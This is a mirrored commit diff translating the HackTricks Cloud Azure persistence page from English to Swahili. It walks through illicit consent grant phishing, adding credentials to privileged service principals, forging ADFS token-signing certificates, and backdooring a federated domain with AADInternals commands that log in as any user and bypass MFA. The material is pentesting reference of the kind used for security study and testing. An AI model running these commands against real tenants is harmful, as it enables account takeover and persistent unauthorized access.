gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-01-14 13:56:30 -08:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['.github/pull_request_template.md', 'src/pentesting-cloud/az

Browse Source
This commit is contained in:
Translator
2024-12-31 19:03:28 +00:00
parent 7770a50092
commit 44da2ea78f
244 changed files with 7940 additions and 10781 deletions
Download Patch File Download Diff File Expand all files Collapse all files

34
src/pentesting-cloud/azure-security/az-persistence/README.md
View File

@@ -4,52 +4,43 @@
### Illicit Consent Grant
By default, any user can register an application in Azure AD. So you can register an application (only for the target tenant) that needs high impact permissions with admin consent (an approve it if you are the admin) - like sending mail on a user's behalf, role management etc.T his will allow us to **execute phishing attacks** that would be very **fruitful** in case of success.
Kwa default, mtumiaji yeyote anaweza kujiandikisha programu katika Azure AD. Hivyo unaweza kujiandikisha programu (tu kwa ajili ya mpangilio wa lengo) inayohitaji ruhusa zenye athari kubwa kwa idhini ya admin (na kuidhinisha ikiwa wewe ni admin) - kama kutuma barua pepe kwa niaba ya mtumiaji, usimamizi wa majukumu n.k. Hii itaturuhusu **kutekeleza mashambulizi ya phishing** ambayo yatakuwa na **faida** kubwa endapo yatakuwa na mafanikio.
Moreover, you could also accept that application with your user as a way to maintain access over it.
Zaidi ya hayo, unaweza pia kukubali programu hiyo kwa mtumiaji wako kama njia ya kudumisha ufikiaji juu yake.
### Applications and Service Principals
With privileges of Application Administrator, GA or a custom role with microsoft.directory/applications/credentials/update permissions, we can add credentials (secret or certificate) to an existing application.
Kwa ruhusa za Msimamizi wa Programu, GA au jukumu la kawaida lenye ruhusa microsoft.directory/applications/credentials/update, tunaweza kuongeza akreditivu (siri au cheti) kwa programu iliyopo.
It's possible to **target an application with high permissions** or **add a new application** with high permissions.
Inawezekana **kulenga programu yenye ruhusa kubwa** au **kuongeza programu mpya** yenye ruhusa kubwa.
An interesting role to add to the application would be **Privileged authentication administrator role** as it allows to **reset password** of Global Administrators.
This technique also allows to **bypass MFA**.
Jukumu la kuvutia kuongeza kwenye programu ingekuwa **jukumu la msimamizi wa uthibitishaji mwenye ruhusa** kwani inaruhusu **kurekebisha nenosiri** la Wasimamizi wa Kimataifa.
Teknolojia hii pia inaruhusu **kuzidi MFA**.
```powershell
$passwd = ConvertTo-SecureString "J~Q~QMt_qe4uDzg53MDD_jrj_Q3P.changed" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("311bf843-cc8b-459c-be24-6ed908458623", $passwd)
Connect-AzAccount -ServicePrincipal -Credential $credentials -Tenant e12984235-1035-452e-bd32-ab4d72639a
```
- For certificate based authentication
- Kwa uthibitisho wa msingi wa cheti
```powershell
Connect-AzAccount -ServicePrincipal -Tenant <TenantId> -CertificateThumbprint <Thumbprint> -ApplicationId <ApplicationId>
```
### Federation - Token Signing Certificate
With **DA privileges** on on-prem AD, it is possible to create and import **new Token signing** and **Token Decrypt certificates** that have a very long validity. This will allow us to **log-in as any user** whose ImuutableID we know.
**Run** the below command as **DA on the ADFS server(s)** to create new certs (default password 'AADInternals'), add them to ADFS, disable auto rollver and restart the service:
```powershell
New-AADIntADFSSelfSignedCertificates
```
Then, update the certificate information with Azure AD:
Kisha, sasisha taarifa za cheti na Azure AD:
```powershell
Update-AADIntADFSFederationSettings -Domain cyberranges.io
```
### Federation - Trusted Domain
With GA privileges on a tenant, it's possible to **add a new domain** (must be verified), configure its authentication type to Federated and configure the domain to **trust a specific certificate** (any.sts in the below command) and issuer:
Kwa kuwa na haki za GA kwenye mpangilio, inawezekana **kuongeza eneo jipya** (lazima liwe limehakikishwa), kuunda aina yake ya uthibitishaji kuwa ya Shirikisho na kuunda eneo hilo **kuamini cheti maalum** (any.sts katika amri iliyo hapa chini) na mtoaji:
```powershell
# Using AADInternals
ConvertTo-AADIntBackdoor -DomainName cyberranges.io
@@ -60,13 +51,8 @@ Get-MsolUser | select userPrincipalName,ImmutableID
# Access any cloud app as the user
Open-AADIntOffice365Portal -ImmutableID qIMPTm2Q3kimHgg4KQyveA== -Issuer "http://any.sts/B231A11F" -UseBuiltInCertificate -ByPassMFA$true
```
## References
## Marejeo
- [https://aadinternalsbackdoor.azurewebsites.net/](https://aadinternalsbackdoor.azurewebsites.net/)
{{#include ../../../banners/hacktricks-training.md}}